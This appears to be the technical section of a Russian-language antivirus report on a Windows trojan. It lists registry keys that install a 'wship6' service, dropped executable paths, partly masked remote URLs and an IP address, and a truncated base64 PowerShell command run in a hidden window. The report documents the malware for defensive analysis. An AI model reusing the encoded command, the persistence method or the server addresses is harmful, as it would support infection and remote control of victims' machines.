Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\wship6] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\wship6] 'ImagePath' = '"<SYSTEM32>\NlsData0019\wship6.exe"'
- 'wship6' "<SYSTEM32>\NlsData0019\wship6.exe"
- 'wship6' <SYSTEM32>\NlsData0019\wship6.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADYAZQA2AHkAOQBmAD0AKAAoACcAWgBtACcAKwAnAHMAJwApACsAKAAnAHIAbwAnACsAJwByAGoAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBlAHIAUAByAE8AZgBpAGwARQBcAEwAVAAwAE...
- %HOMEPATH%\lt0edpr\jom4el2\xz7eocqb.exe
- <SYSTEM32>\nlsdata0019\wship6.exe
- %HOMEPATH%\lt0edpr\jom4el2\xz7eocqb.exe в <SYSTEM32>\nlsdata0019\wship6.exe
- '19#.#58.216.73':80
- http://ja##uh.nl/system/5UMD6dd/
- http://19#.#58.216.73/shAr5oWMZ5uCb6/d3Vr99W915nI/wFmPp/
- DNS ASK ja##uh.nl
- '%HOMEPATH%\lt0edpr\jom4el2\xz7eocqb.exe'
- '<SYSTEM32>\nlsdata0019\wship6.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADYAZQA2AHkAOQBmAD0AKAAoACcAWgBtACcAKwAnAHMAJwApACsAKAAnAHIAbwAnACsAJwByAGoAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBlAHIAUAByAE8AZgBpAGwARQBcAEwAVAAwAE...' (со скрытым окном)